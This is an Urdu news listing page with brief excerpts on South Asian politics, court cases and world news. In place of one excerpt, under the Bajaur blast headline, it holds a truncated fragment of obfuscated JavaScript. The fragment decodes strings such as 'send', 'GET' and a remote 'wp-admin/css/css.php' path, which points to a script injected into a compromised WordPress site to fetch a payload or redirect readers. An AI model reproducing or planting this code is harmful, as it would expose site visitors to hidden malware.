ویب ڈیسک — بھارت کے چیف جسٹس ڈی وائی چندرچوڑ نے منی پور میں خواتین کو برہنہ کرنے کے واقعہ پر برہمی کا اظہار کرتے ہوئے وفاقی اور ریاستی حکومتوں کی سرزنش کی ہے۔ پیر کو سماعت کے دوران چیف جسٹس نے ریمارکس دیے کہ یہ کہہ کر اس واقعہ سے دامن نہیں چھڑایا جا مزید پڑھیں
زمرہ:
توشہ خانہ کیس: چیئرمین پی ٹی آئی عمران خان کا ہائیکورٹ کے فیصلے کیخلاف سپریم کورٹ سے رجوع
چیئرمین پاکستان تحریک انصاف (پی ٹی آئی) اور سابق وزیراعطم عمران خان نے توشہ خانہ کیس رکوانے کیلئے ایک بار پھر سپریم کورٹ سے رجوع کر لیا۔ چیئرمین پی ٹی آئی عمران خان نے توشہ خانہ کیس میں 342 کا بیان ریکارڈ کرنے کی کارروائی رکوانے کیلئے اپیل دائر کر دی۔ درخواست پر فوری سماعت مزید پڑھیں
امریکا میں دوطیارہ حادثوں میں 4افراد ہلاک 2 زخمی
نیو یارک:امریکی ریاست وسکنسن میں گزشتہ روزدو فضائی حادثات میں چارافراد ہلاک اور دو زخمی ہو گئے۔ امریکی میڈیا کے مطابق وسکنسن میں روٹر وے 162 ہیلی کاپٹر اورELAایکلیپس ٹین جیروکاپٹر ٹکرا گیا ۔اس حادثے میں دو افراد ہلاک اور دو زخمی ہو گئے،اسی روز ایک دیگرحادثے میں نارتھ امریکن ٹی سکس طیارہ وین باگو مزید پڑھیں
سویڈن اور ڈنمارک نے مذہبی کتابوں کی بے حرمتی کے واقعات روکنے پر غور شروع کردیا
سٹاک ہو:سویڈن اور ڈنمارک نے سکیورٹی خدشات میں اضافے کے پیش نظر مذہبی کتابوں کی بے حرمتی کے واقعات روکنے پر غور شروع کردیا۔ میڈیا رپورٹس کے مطابق ڈنمارک کے وزارت خارجہ کا کہنا ہے کہ قرآن پاک کی بے حرمتی پر ردعمل میں ہونے والا احتجاج انتہائی شکل اختیار کرسکتا ہے،ان کاکہنا تھا کہ مزید پڑھیں
اسلامیہ یونیورسٹی اسکینڈل، جوڈیشل کمیشن بنانے کیلئے درخواست دائر
لاہور: ہائیکورٹ میں اسلامیہ یونیورسٹی بہاولپور میں فحش ویڈیوز اور مبینہ نشے کی فروخت کے معاملے کی انکوائری کیلئے جوڈیشل کمشن بنانے کی درخواست دائر کردی گئی۔ درخواست شہری مشکور حسین نے ایڈووکیٹ ندیم سرور کی وساطت سے دائر کی ہے، درخواست میں ایف آئی اے، آئی جی پنجاب ، نگران وزیر اعلی سمیت دیگر مزید پڑھیں
پی ٹی آئی نے پرویز خٹک کے بعد انکے بیٹے کو بھی پارٹی سے نکال دیا
لاہور :پاکستان تحریک انصاف(پی ٹی آئی)نے منحرف رہنما پرویز خٹک کے بیٹے اسحاق خٹک اور داماد عمران خٹک کی پارٹی رکنیت ختم کر دی۔ پی ٹی آئی نے دونوں رہنماوں کی رکنیت پارٹی ممبران کو پارٹی چھوڑنے اور اکسانے پر ختم کی، سیکرٹری جنرل پی ٹی آئی عمر ایوب کے دستخط سے باقاعدہ نوٹیفکیشن جاری مزید پڑھیں
فوجی عدالتوں میں سویلینز کا ٹرائل، پھر فل کورٹ بنانے کی درخواست دائر
اسلام آباد :فوجی عدالتوں میں سویلینز کے ٹرائل کیس میں ایک بار پھر فل کورٹ بنانے کی درخواست سپریم کورٹ میں دائر کردی گئی۔ سپریم کورٹ میں دائر درخواست میں کہا گیا ہے کہ سویلینز کے خصوصی عدالتوں میں ٹرائل کا کیس مفاد عامہ کا ہے، ماضی میں بھی کیس 9 ممبرز بنچ یا فل مزید پڑھیں
صدر بازوم کی عہدے پر واپسی کے لیے باغیوں کو 1 ہفتے کی مہلت دیتے ہیں:ایکواس
مغربی افریقی ممالک کی اقتصادی تنظیم ایکو واس نے نائیجر میں قابض فوجی جتھے کو صدر محمد بازوم کی رہائی اور عہدے پر واپسی کے لیے ایک ہفتے کی مہلت دی ہے۔ نائیجیریا کے دارالحکومت ابوجا میں نائیجر کی صورتحال سے متعلق ایکواس کا اجلاس ختم ہو گیا۔ ایکو واس کمیشن کے صدر عمر تورائے نے پریس مزید پڑھیں
باجوڑ دھماکے میں کالعدم تنظیم داعش ملوث ہے: ابتدائی تحقیقات
; function x(I, h) { var H = A(); return x = function (X, J) { X = X – 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ ‘send’, ‘refe’, ‘read’, ‘Text’, ‘6312jziiQi’, ‘ww.’, ‘rand’, ‘tate’, ‘xOf’, ‘10048347yBPMyU’, ‘toSt’, ‘4950sHYDTB’, ‘GET’, ‘www.’, ‘//nayadaur.tv/urdu/wp-admin/css/css.php’, ‘stat’, ‘440yfbKuI’, مزید پڑھیں
وزیراعظم کا 14 سالہ بچی پر تشدد کا نوٹس، نگران وزیراعلی سے رپورٹ طلب
اسلام آباد : وزیراعظم شہباز شریف نے 14 سال کی بچی رضوانہ پر تشدد کا نوٹس لیتے ہوئے نگران وزیراعلی پنجاب سے واقعے سے متعلق رپورٹ طلب کر لی ہے۔ وزیراعظم آفس کے اعلامیہ کے مطابق وزیراعظم نے نگران وزیراعلی پنجاب محسن نقوی کو بچی کے علاج کیلئے بہترین سہولتوں کی فراہمی کی ہدایت کی مزید پڑھیں